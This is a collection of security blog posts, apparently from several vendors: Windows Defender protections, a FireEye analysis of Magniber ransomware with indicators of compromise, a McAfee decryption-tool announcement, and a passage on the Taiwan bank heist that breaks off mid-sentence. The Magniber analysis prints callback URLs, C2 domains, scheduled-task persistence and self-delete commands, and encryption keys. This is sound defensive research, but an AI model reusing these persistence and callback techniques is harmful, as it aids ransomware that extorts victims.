In enterprise environments there are additional layers of protection. Device Guard provides virtualization-based lockdown security. It blocks all types of unauthorized content, stopping ransomware and other threats from reaching the machine.

In addition to Microsoft Edge, enterprises can also ensure online safety by blocking ransomware attacks that begin with email. Microsoft Exchange Online Protection (EOP) uses built-in anti-spam filtering capabilities that help protect Office 365 customers. Office 365 Advanced Threat Protection helps secure mailboxes against email attacks by blocking emails with unsafe attachments, malicious links, and linked-to files leveraging time-of-click protection.

Windows Defender ATP powers security operations personnel to detect and respond to malware outbreaks in their organization. Windows Defender ATP’s enhanced behavioral and machine learning detection libraries flag malicious behavior across the ransomware infection process. The new process tree visualization and improvements in machine isolation help security operations to investigate and respond to ransomware and other malicious attacks.

Controlled folder access is a new piece to this growing stack of next-gen solutions that help you prevent, detect, and respond to ransomware and other modern attacks.

Controlled folder access, Exploit Protection, Attack surface reduction, and Network protection make up the host intrusion prevention capabilities in Windows Defender Exploit Guard. These features and all the other next-gen security technologies that ship with the Fall Creators Update continue to make Windows 10 the safest, most secure Windows ever.

Learn more about Windows 10 Fall Creators Update

Microsoft 365 Security and Management Features Available in Fall Creators Update

Windows Defender Exploit Guard: Reduce the attack surface against next-generation malware

Stopping ransomware where it counts: Protecting your data with Controlled folder access

Making Microsoft Edge the most secure browser with Windows Defender Application Guard

Introducing Windows Defender Application Control

Hardening the system and maintaining integrity with Windows Defender System Guard

Move away from passwords, deploy Windows Hello. Today!

What’s new in Windows Defender ATP Fall Creators Update

Antivirus evolved

Get the latest information on ransomware

Our ransomware FAQ page summarizes the latest developments in the ransomware landscape. It has information about the most prevalent ransomware families like Cerber, WannaCrypt, Spora, Teerac (also known as Crypt0L0cker or CryptoLocker), and Locky, as well as the latest notable ransomware families like Tibbar (also known as Bad Rabbit), Ronggolawe, Petya (also referred to as NotPetya), Erebus, and others.

 


Talk to us

Questions, concerns, or insights on this story? Join discussions at the Microsoft community.

Follow us on Twitter @MMPC and Facebook Microsoft Malware Protection Center

 

Magniber Ransomware Wants to Infect Only the Right People

Introduction

Exploit kit (EK) use has been on the decline since late 2016; however, certain activity remains consistent. The Magnitude Exploit Kit is one such example that continues to affect users, particularly in the APAC region.

In Figure 1, which is based on FireEye Dynamic threat Intelligence (DTI) reports shared in March 2017, we can see the regions affected by Magnitude EK activity during the last three months of 2016 and the first three months of 2017.


Figure 1: Magnitude EK distribution as seen in March 2017

This trend continued until late September 2017, when we saw Magnitude EK focus primarily on the APAC region, with a large chunk targeting South Korea. Magnitude EK activity then fell off the radar until Oct. 15, 2017, when it came back and began focusing solely on South Korea. Previously it had been distributing Cerber ransomware, but Cerber distribution has declined (we have also seen a decline of Cerber being distributed via email) and now it is distributing ransomware known as Magniber. 

Infection

The first reappearance of Magnitude EK on Oct. 15 came as a malvertising redirection from the domain: fastprofit[.]loan. The infection chain is shown in Figure 2.


Figure 2: Infection chain

The Magnitude EK landing page consisted of CVE-2016-0189, which was first reported by FireEye as being used in Neutrino Exploit Kit after it was patched. Figure 3 shows the landing page and CVE usage.


Figure 3: Magnitude EK landing page

As seen previously with Magnitude EK, the payload is downloaded as a plain EXE (see Figure 4) and domain infrastructure is hosted on the following server:

“Apache/2.2.15 (CentOS) DAV/2 mod_fastcgi/2.4.6”


Figure 4: Magnitude payload header and plain MZ response

Payload

In the initial report published by our colleagues at Trend Micro, the ransomware being distributed is referred to as Magniber. These ransomware payloads only seem to target Korean systems, since they won’t execute if the system language is not Korean.

Magniber encrypts user data using the AES128. The sample used (dc2a2b84da359881b9df1ec31d03c715) for this analysis was pulled from our DTI system when the campaign was active. Of note, this sample differs from the hash shared publically by Trend Micro, but the two exhibit the same behavior and share the infection vector, and both were distributed around the same time.

The malware contains a binary payload in its resource section encrypted in reverse using RC4. It starts unpacking it from the end of the buffer to its start. Reverse RC4 decryption keys are 30 bytes long and also contain non-ASCII characters. They are as follows:

  • dc2a2b84da359881b9df1ec31d03c715 RC4 key:
    • { 0x6b, 0xfe, 0xc4, 0x23, 0xac, 0x50, 0xd7, 0x91, 0xac, 0x06, 0xb0, 0xa6, 0x65, 0x89, 0x6a, 0xcc, 0x05, 0xba, 0xd7, 0x83, 0x04, 0x90, 0x2a, 0x93, 0x8d, 0x2d, 0x5c, 0xc7, 0xf7, 0x3f }

The malware calls GetSystemDefaultUILanguage, and if the system language is not Korean, it exits (instructions can be seen in Figure 5). After unpacking in memory, the malware starts executing the unpacked payload.


Figure 5: Language check targeted at Korea

A mutex with name "ihsdj" is created to prevent multiple executions. The payload then generates a pseudorandom 19-character string based on the CPU clock from multiple GetTickCount calls. The string is then used to create a file in the user’s %TEMP% directory (e.g. "xxxxxxxxxxxxxxxxxxx.ihsdj"), which contains the IV (Initialization Vector) for the AES128 encryption and a copy of the malware itself with the name "ihsdj.exe".

Next, the malware constructs 4 URLs for callback. It uses the 19-character long pseudorandom string it generated, and the following domains to create the URLs:

  • bankme.date
  • jobsnot.services
  • carefit.agency
  • hotdisk.world

In order to evade sandbox systems, the malware checks to see if it's running inside a VM and appends the result to the URL callback. It does this by sandwiching and executing CPUID instructions (shown in Figure 6) between RDTSC calls, forcing VMEXIT.


Figure 6: CPUID instruction to detect VM presence

The aforementioned VM check is done multiple times to gather the average execution time of the CPUID, and if the average execution time is greater than 1000, it considers the system to be a VM. In case the test fails and the malware thinks the system is a VM, a "1" is appended at the end of the URL (see Figure 7); otherwise, "0" is appended. The format of the URL is as follows:

  • http://[19 character pseudorandom string].[callback domain]/new[0 or 1]

Examples of this would be:

  • http://7o12813k90oggw10277.bankme[.]date/new1
  • http://4bg8l9095z0287fm1j5.bankme[.]date/new0


Figure 7: Command and control communication

If the malware is executed a second time after encryption, the callback URL ends in "end0" or "end1" instead of "new". An example of this would be:

  • hxxp://j2a3y50mi0a487230v1.bankme[.]date/end1

The malware then starts to encrypt user files on the system, renaming them by adding a ".ihsdj" extension to the end. The AES128 Key and IV for the sample analyzed are listed:

  • IV: EP866p5M93wDS513
  • AES128 Key: S25943n9Gt099y4K

A text file "READ_ME_FOR_DECRYPT_xxxxxxxxxxxxxxxxxxx_.txt" is created in the user’s %TEMP% directory and shown to the user. The ransom message is shown in Figure 8.


Figure 8: Ransom message for the infected user

The malware also adds scheduled tasks to run its copy from %TEMP% with compatibility assistant, and loads the user message as follows:

  • schtasks /create /SC MINUTE /MO 15 /tn ihsdj /TR "pcalua.exe -a %TEMP%\ihsdj.exe
  • schtasks /create /SC MINUTE /MO 15 /tn xxxxxxxxxxxxxxxxxxx /TR %TEMP%\READ_ME_FOR_DECRYPT_xxxxxxxxxxxxxxxxxxx_.txt

The malware then issues a command to delete itself after exiting, using the following local ping to provide delay for the deletion:

  • cmd /c ping localhost -n 3 > nul & del C:\PATH\MALWARE.EXE)

Figure 9 contains the Python code for unpacking the malware payload, which is encrypted using RC4 in reverse.


Figure 9: Python script for unpacking malware payload

Conclusion

Ransomware is a significant threat to enterprises. While the current threat landscape suggests a large portion of attacks are coming from emails, exploit kits continue to put users at risk – especially those running old software versions and not using ad blockers. Enterprises need to make sure their network nodes are fully patched.

All FireEye products detect the malware in our MVX engine. Additionally, FireEye NX blocks delivery at the infection point.

IOCs

Malware Sample Hash
  • dc2a2b84da359881b9df1ec31d03c715 (decryption key shared)
Malverstiser Domains
  • fastprofit[.]loan
  • fastprofit[.]me
EK Domain Examples
  • 3e37i982wb90j.fileice[.]services
  • a3co5a8iab2x24g90.helpraw[.]schule
  • 2i1f3aadm8k.putback[.]space
Command and Control Domains
  • 3ee9fuop6ta4d6d60bt.bankme.date
  • 3ee9fuop6ta4d6d60bt.jobsnot.services
  • 3ee9fuop6ta4d6d60bt.carefit.agency
  • 3ee9fuop6ta4d6d60bt.hotdisk.world

Ransomware Decryption Framework – Now Available

This blog details the availability of the McAfee Ransomware Recover (Mr 2).  We would like to credit Kunal Mehta and Charles McFarland in the work required to develop this framework.

How do I get my files back?  This is probably the first question asked when ransomware strikes. Of course, the answer will depend on whether there is a backup available. Or if a decryption tool exists on the www.nomoreransom.org website.

Developing these tools invariably involve significant effort to identify the decryption keys, but also create a tool that can be tested, hosted and then made freely available to help victims of ransomware. Today however we are pleased to announce the availability of McAfee Ransomware Recover (Mr 2), this framework will allow for the rapid incorporation of decryption keys and custom decryption logic (when they become available) and get help to victims of ransomware a lot quicker.

Now, whilst the availability of a framework is important its probably not something you would say deserves the fanfare of the communications we have produced. However, the key difference here is that this framework is free to use for the security community. So if security researchers have identified decryption keys and custom decryption logic for a ransomware variant, and do not want to spend the time to produce their own tool then McAfee Ransomware Recover (Mr 2) is available to freely use.

Over the course of the next few weeks we will produce more guidance on the tool, including webcasts by the development team. Also, we will remain committed to working with our public and private sector partners to get our hands on as many decryption keys as possible.

Follow us on Twitter for all updates from #MPOWER17 at @McAfee.

The post Ransomware Decryption Framework – Now Available appeared first on McAfee Blogs.

Taiwan Bank Heist and the Role of Pseudo Ransomware

Widespread reports claim the Far Eastern International Bank in Taiwan has become a victim of hacking. The attacks demonstrate the global nature of cybercrime, with the cybercriminals attempting to wire US$60 million to destinations such as Sri Lanka, Cambodia, and the United States. Recent reports from Sri Lanka say that two individuals have been arrested for suspected money laundering after a tip-off from the Bank of Ceylon, which reported a suspicious transfer of $1.2 million from the Far Eastern International Bank.

On Saturday October 7, Far Eastern International Bank reported that it had recovered most of the money and that overall losses could reach $500,000.

How did the attack happen?

Based on the initial intelligence we have received, the first direct interaction with the victim began with spear phishing attacks that contained “backdoor” attachments.

Figures 1 and 2 provide some examples of the attachments.

Figure 1: Spear phishing attachment.

Figure 2: Spear phishing attachment.

When the victim clicks on the link, they are redirected to a malicious site that downloads additional files to the victim’s computer. One example of these malicious sites is hxxps://jobsbankbd.com/maliciousfilename.exe.

This site hosts another backdoor that gives the criminals access to the victim’s system in the bank.

Once the criminals gain access to the systems, our initial analysis reveals that the attackers harvested credentials. This was confirmed by evidence we found in a sample that contained the following credentials from the bank:

  • FEIB\SPUSER14
  • FEIB\scomadmin

These credentials are used to create a scheduled task on the system and monitor the running of endpoint security services. (This does not indicate a problem with the security software, only that the attackers did their research and took measures to take out the security software being run within the bank.) We have notified the security provider, and have provided all of our research to date.

Besides the scheduled task and credentials, we discovered another interesting piece of code. I